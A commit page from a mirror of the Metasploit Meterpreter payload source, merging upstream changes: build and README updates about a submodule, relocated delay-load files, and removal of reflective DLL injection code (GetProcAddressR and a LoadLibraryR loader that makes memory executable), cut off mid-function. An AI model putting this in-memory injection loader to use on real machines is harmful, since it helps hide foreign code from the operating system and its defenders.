github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Merge branch 'upstream/master' into clipboard_monitor

Browse Source 
Conflicts:
	source/ReflectiveDLLInjection
	source/extensions/extapi/extapi.c
	source/extensions/extapi/extapi.h
	workspace/ext_server_extapi/ext_server_extapi.vcxproj
This commit is contained in:
OJ 2014-01-22 22:53:29 +10:00
commit 5b1007e940
70 changed files with 2650 additions and 2983 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
c/meterpreter/.gitignore vendored
View File

@ -21,6 +21,10 @@ tags
# project config output
r7_release
r7_debug
debug
release
Debug
Release
# temporary files
*.swp
@ -39,7 +43,8 @@ workspace/Backup/*
source/jpeg-8/Backup/*
# other VS garbage
*.*proj.filters
*.suo
*.ncb
# ignore posix temp stuff
posix-meterp-build-tmp/*

3
c/meterpreter/.gitmodules vendored Normal file
View File

@ -0,0 +1,3 @@
[submodule "source/ReflectiveDLLInjection"]
path = source/ReflectiveDLLInjection
url = https://github.com/rapid7/ReflectiveDLLInjection.git

2
c/meterpreter/Makefile
View File

@ -114,7 +114,7 @@ $(COMPILED)/libssl.so: $(build_tmp)/openssl-0.9.8o/libssl.so
$(build_tmp)/openssl-0.9.8o/libssl.so:
[ -d $(build_tmp) ] || mkdir $(build_tmp)
[ -f $(build_tmp)/openssl-0.9.8o.tar.gz ] || wget -O $(build_tmp)/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
[ -f $(build_tmp)/openssl-0.9.8o.tar.gz ] || wget -O $(build_tmp)/openssl-0.9.8o.tar.gz https://www.openssl.org/source/openssl-0.9.8o.tar.gz
[ -d $(build_tmp)/openssl-0.9.8o ] || tar -C $(build_tmp)/ -xzf $(build_tmp)/openssl-0.9.8o.tar.gz
(cd $(build_tmp)/openssl-0.9.8o && \
cat Configure | grep -v 'linux-msf' | \

31
c/meterpreter/README.md
View File

@ -22,6 +22,22 @@ with Windows XP due to the fact that .NET 4.5 will not run on Windows XP. Howeve
does not mean that Metepreter itself will not run on Windows XP, it just means that it's
not possible to _build_ it on Windows XP.
Windows Meterpreter has the following repositories set up as submodule dependencies:
* [Reflective DLL Injection][rdi]
For Meterpreter to build correctly, these submodules must be initialised and updated,
like so:
``` bash
$ git clone https://github.com/rapid7/meterpreter
$ cd meterpreter
$ git submodule init && git submodule update
```
At this point the dependencies will be ready to use and Meterpreter should be ready to
build.
Running the Build
-----------------
@ -49,6 +65,15 @@ appropriate build configuration for you and hence calling `make` should "Just Wo
If you are a Rapid7 employee you will need the PSSDK source in order to build the
extra components using the `r7_*` build configurations.
If submodule dependencies are not found on the file system, the script should display
an error message like so:
```
Meterpreter's submodule dependencies can't be found.
From your git console, please run:
$ git submodule init && git submodule update
```
Building - POSIX
================
You will need:
@ -60,11 +85,10 @@ You will need:
Meterpreter requires libpcap-1.1.1 and OpenSSL 0.9.8o sources, which it
will download automatically during the build process. If for some
reason, you cannot access the internet during build, you will need to:
- wget -O posix-meterp-build-tmp/openssl-0.9.8o.tar.gz http://openssl.org/source/openssl-0.9.8o.tar.gz
- wget -O posix-meterp-build-tmp/openssl-0.9.8o.tar.gz https://www.openssl.org/source/openssl-0.9.8o.tar.gz
- wget -O posix-meterp-build-tmp/libpcap-1.1.1.tar.gz http://www.tcpdump.org/release/libpcap-1.1.1.tar.gz
Note that the 'depclean' and 'really-clean' make targets will *delete*
these files.
(Note that 'make clean' will *delete* these files.)
Now you should be able to type `make` in the base directory, go make a
sandwich, and come back to a working[1] meterpreter for Linux.
@ -161,3 +185,4 @@ Good luck!
[source]: https://github.com/rapid7/meterpreter
[framework]: https://github.com/rapid7/metasploit-framework
[build_icon]: https://ci.metasploit.com/buildStatus/icon?job=MeterpreterWin
[rdi]: https://github.com/rapid7/ReflectiveDLLInjection

16
c/meterpreter/make.bat
View File

@ -2,6 +2,12 @@
IF "%1"=="clean" GOTO CLEAN
IF "%1"=="docs" GOTO DOCS
IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
IF NOT EXIST "source\ReflectiveDLLInjection\.git" (
ECHO Meterpreter's submodule dependencies can't be found.
ECHO From your git console, please run:
ECHO $ git submodule init ^&^& git submodule update
GOTO END
)
SET PSSDK_VER=12
@ -48,7 +54,11 @@ IF "%ERRORLEVEL%" == "0" (
)
)
GOTO :END
FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
echo Finished %ldt%
GOTO END
:CLEAN
IF EXIST "output\x86\" (
@ -57,11 +67,11 @@ IF EXIST "output\x86\" (
IF EXIST "output\x64\" (
del output\x64\ /S /Q
)
GOTO :END
GOTO END
:DOCS
tools\doxygen\doxygen.exe doxygen.cnf
GOTO :END
GOTO END
:NEED_VS
ECHO "This command must be executed from within a Visual Studio Command prompt."

146
c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.c → c/meterpreter/source/DelayLoadMetSrv/DelayLoadMetSrv.c
View File

@ -1,74 +1,74 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "DelayLoadMetSrv.h"
#include "GetProcAddressR.h"
// The handle to the injected metsrv.dll, needed for delay loading...
HMODULE hMetSrv = NULL;
// All server extensions must support delay loading of metsrv.dll because this dll can be injected
// via reflective dll injection, as such normal calls to LoadLibrary/GetModuleHandle/GetProcAddress
// to resolve exports in metsrv.dll will not work as metsrv.dll will be 'invisible' to the native
// windows kernel32 api's. Theirfore we delay load metsrv.dll and intercept loading and resolving of
// its exports and resolve them using our own GetProcAddressR() function.
//
// To enable all of this in a new extnesion:
// 1. Add metsrv.dll to the DELAYLOAD option in the projects properties (Configuration->Linker->Input).
// 2. Add in the include file #include "DelayLoadMetSrv.h".
// 3. Add the macro "EnableDelayLoadMetSrv();" after all your includes.
// 4. Add the line "hMetSrv = remote->hMetSrv;" in your InitServerExtension() function.
//===============================================================================================//
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli )
{
switch( dliNotify )
{
case dliNotePreLoadLibrary:
// If we are trying to delay load metsrv.dll we can just return the
// HMODULE of the injected metsrv library (set in InitServerExtension).
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return (FARPROC)hMetSrv;
break;
case dliNotePreGetProcAddress:
// If we are trying to get the address of an exported function in the
// metsrv.dll we must use GetProcAddressR() in case the metsrv was loaded
// via reflective dll injection
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return GetProcAddressR( pdli->hmodCur, pdli->dlp.szProcName );
break;
default:
return NULL;
}
return NULL;
}
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "DelayLoadMetSrv.h"
#include "GetProcAddressR.h"
// The handle to the injected metsrv.dll, needed for delay loading...
HMODULE hMetSrv = NULL;
// All server extensions must support delay loading of metsrv.dll because this dll can be injected
// via reflective dll injection, as such normal calls to LoadLibrary/GetModuleHandle/GetProcAddress
// to resolve exports in metsrv.dll will not work as metsrv.dll will be 'invisible' to the native
// windows kernel32 api's. Theirfore we delay load metsrv.dll and intercept loading and resolving of
// its exports and resolve them using our own GetProcAddressR() function.
//
// To enable all of this in a new extnesion:
// 1. Add metsrv.dll to the DELAYLOAD option in the projects properties (Configuration->Linker->Input).
// 2. Add in the include file #include "DelayLoadMetSrv.h".
// 3. Add the macro "EnableDelayLoadMetSrv();" after all your includes.
// 4. Add the line "hMetSrv = remote->hMetSrv;" in your InitServerExtension() function.
//===============================================================================================//
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli )
{
switch( dliNotify )
{
case dliNotePreLoadLibrary:
// If we are trying to delay load metsrv.dll we can just return the
// HMODULE of the injected metsrv library (set in InitServerExtension).
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return (FARPROC)hMetSrv;
break;
case dliNotePreGetProcAddress:
// If we are trying to get the address of an exported function in the
// metsrv.dll we must use GetProcAddressR() in case the metsrv was loaded
// via reflective dll injection
if( strcmp( pdli->szDll, "metsrv.dll" ) == 0 )
return GetProcAddressR( pdli->hmodCur, pdli->dlp.szProcName );
break;
default:
return NULL;
}
return NULL;
}
//===============================================================================================//

92
c/meterpreter/source/ReflectiveDLLInjection/DelayLoadMetSrv.h → c/meterpreter/source/DelayLoadMetSrv/DelayLoadMetSrv.h
View File

@ -1,46 +1,46 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_DELAYLOADMETSRV_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_DELAYLOADMETSRV_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Delayimp.h>
#pragma comment (lib,"Delayimp.lib")
// we use this like a macro to set the hook in an server extension that requires it
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
extern HMODULE hMetSrv;
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
//===============================================================================================//
#endif
//===============================================================================================//
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_DELAYLOADMETSRV_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_DELAYLOADMETSRV_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Delayimp.h>
#pragma comment (lib,"Delayimp.lib")
// we use this like a macro to set the hook in an server extension that requires it
#define EnableDelayLoadMetSrv() PfnDliHook __pfnDliNotifyHook2 = delayHook; // set our delay loader hook, see DelayLoadMetSrv.c
extern HMODULE hMetSrv;
FARPROC WINAPI delayHook( unsigned dliNotify, PDelayLoadInfo pdli );
//===============================================================================================//
#endif
//===============================================================================================//

1
c/meterpreter/source/ReflectiveDLLInjection Submodule

@ -0,0 +1 @@
Subproject commit 88e8e5f109793f09b35cb17a621f33647d644103

116
c/meterpreter/source/ReflectiveDLLInjection/GetProcAddressR.c
View File

@ -1,116 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "GetProcAddressR.h"
//===============================================================================================//
// We implement a minimal GetProcAddress to avoid using the native kernel32!GetProcAddress which
// wont be able to resolve exported addresses in reflectivly loaded librarys.
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName )
{
UINT_PTR uiLibraryAddress = 0;
FARPROC fpResult = NULL;
if( hModule == NULL )
return NULL;
// a module handle is really its base address
uiLibraryAddress = (UINT_PTR)hModule;
__try
{
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiNameOrdinals = 0;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
PIMAGE_DATA_DIRECTORY pDataDirectory = NULL;
PIMAGE_EXPORT_DIRECTORY pExportDirectory = NULL;
// get the VA of the modules NT Header
pNtHeaders = (PIMAGE_NT_HEADERS)(uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew);
pDataDirectory = (PIMAGE_DATA_DIRECTORY)&pNtHeaders->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
pExportDirectory = (PIMAGE_EXPORT_DIRECTORY)( uiLibraryAddress + pDataDirectory->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + pExportDirectory->AddressOfFunctions );
// get the VA for the array of name pointers
uiNameArray = ( uiLibraryAddress + pExportDirectory->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiLibraryAddress + pExportDirectory->AddressOfNameOrdinals );
// test if we are importing by name or by ordinal...
if( ((DWORD)lpProcName & 0xFFFF0000 ) == 0x00000000 )
{
// import by ordinal...
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( (DWORD)lpProcName ) - pExportDirectory->Base ) * sizeof(DWORD) );
// resolve the address for this imported function
fpResult = (FARPROC)( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// import by name...
DWORD dwCounter = pExportDirectory->NumberOfNames;
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiLibraryAddress + DEREF_32( uiNameArray ));
// test if we have a match...
if( strcmp( cpExportedFunctionName, lpProcName ) == 0 )
{
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// calculate the virtual address for the function
fpResult = (FARPROC)(uiLibraryAddress + DEREF_32( uiAddressArray ));
// finish...
break;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
}
}
__except( EXCEPTION_EXECUTE_HANDLER )
{
fpResult = NULL;
}
return fpResult;
}
//===============================================================================================//

36
c/meterpreter/source/ReflectiveDLLInjection/GetProcAddressR.h
View File

@ -1,36 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
#define _METERPRETER_SOURCE_REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
//===============================================================================================//
#include "ReflectiveDLLInjection.h"
FARPROC WINAPI GetProcAddressR( HANDLE hModule, LPCSTR lpProcName );
//===============================================================================================//
#endif
//===============================================================================================//

233
c/meterpreter/source/ReflectiveDLLInjection/LoadLibraryR.c
View File

@ -1,233 +0,0 @@
//===============================================================================================//
// Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "LoadLibraryR.h"
//===============================================================================================//
DWORD Rva2Offset( DWORD dwRva, UINT_PTR uiBaseAddress )
{
WORD wIndex = 0;
PIMAGE_SECTION_HEADER pSectionHeader = NULL;
PIMAGE_NT_HEADERS pNtHeaders = NULL;
pNtHeaders = (PIMAGE_NT_HEADERS)(uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew);
pSectionHeader = (PIMAGE_SECTION_HEADER)((UINT_PTR)(&pNtHeaders->OptionalHeader) + pNtHeaders->FileHeader.SizeOfOptionalHeader);
if( dwRva < pSectionHeader[0].PointerToRawData )
return dwRva;
for( wIndex=0 ; wIndex < pNtHeaders->FileHeader.NumberOfSections ; wIndex++ )
{
if( dwRva >= pSectionHeader[wIndex].VirtualAddress && dwRva < (pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].SizeOfRawData) )
return ( dwRva - pSectionHeader[wIndex].VirtualAddress + pSectionHeader[wIndex].PointerToRawData );
}
return 0;
}
//===============================================================================================//
DWORD GetReflectiveLoaderOffset( VOID * lpReflectiveDllBuffer )
{
UINT_PTR uiBaseAddress = 0;
UINT_PTR uiExportDir = 0;
UINT_PTR uiNameArray = 0;
UINT_PTR uiAddressArray = 0;
UINT_PTR uiNameOrdinals = 0;
DWORD dwCounter = 0;
#ifdef _WIN64
DWORD dwMeterpreterArch = 2;
#else
// This will catch Win32 and WinRT.
DWORD dwMeterpreterArch = 1;
#endif
uiBaseAddress = (UINT_PTR)lpReflectiveDllBuffer;
// get the File Offset of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// currenlty we can only process a PE file which is the same type as the one this fuction has
// been compiled as, due to various offset in the PE structures being defined at compile time.
if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x010B ) // PE32
{
if( dwMeterpreterArch != 1 )
return 0;
}
else if( ((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.Magic == 0x020B ) // PE64
{
if( dwMeterpreterArch != 2 )
return 0;
}
else
{
return 0;
}
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the File Offset of the export directory
uiExportDir = uiBaseAddress + Rva2Offset( ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress, uiBaseAddress );
// get the File Offset for the array of name pointers
uiNameArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames, uiBaseAddress );
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// get the File Offset for the array of name ordinals
uiNameOrdinals = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals, uiBaseAddress );
// get a counter for the number of exported functions...
dwCounter = ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->NumberOfNames;
// loop through all the exported functions to find the ReflectiveLoader
while( dwCounter-- )
{
char * cpExportedFunctionName = (char *)(uiBaseAddress + Rva2Offset( DEREF_32( uiNameArray ), uiBaseAddress ));
if( strstr( cpExportedFunctionName, "ReflectiveLoader" ) != NULL )
{
// get the File Offset for the array of addresses
uiAddressArray = uiBaseAddress + Rva2Offset( ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions, uiBaseAddress );
// use the functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// return the File Offset to the ReflectiveLoader() functions code...
return Rva2Offset( DEREF_32( uiAddressArray ), uiBaseAddress );
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
return 0;
}
//===============================================================================================//
// Loads a DLL image from memory via its exported ReflectiveLoader function
HMODULE WINAPI LoadLibraryR( LPVOID lpBuffer, DWORD dwLength )
{
HMODULE hResult = NULL;
DWORD dwReflectiveLoaderOffset = 0;
DWORD dwOldProtect1 = 0;
DWORD dwOldProtect2 = 0;
REFLECTIVELOADER pReflectiveLoader = NULL;
DLLMAIN pDllMain = NULL;
if( lpBuffer == NULL || dwLength == 0 )
return NULL;
__try
{
// check if the library has a ReflectiveLoader...
dwReflectiveLoaderOffset = GetReflectiveLoaderOffset( lpBuffer );
if( dwReflectiveLoaderOffset != 0 )
{
pReflectiveLoader = (REFLECTIVELOADER)((UINT_PTR)lpBuffer + dwReflectiveLoaderOffset);
// we must VirtualProtect the buffer to RWX so we can execute the ReflectiveLoader...
// this assumes lpBuffer is the base address of the region of pages and dwLength the size of the region
if( VirtualProtect( lpBuffer, dwLength, PAGE_EXECUTE_READWRITE, &dwOldProtect1 ) )
{
// call the librarys ReflectiveLoader...
pDllMain = (DLLMAIN)pReflectiveLoader();
if( pDllMain != NULL )
{
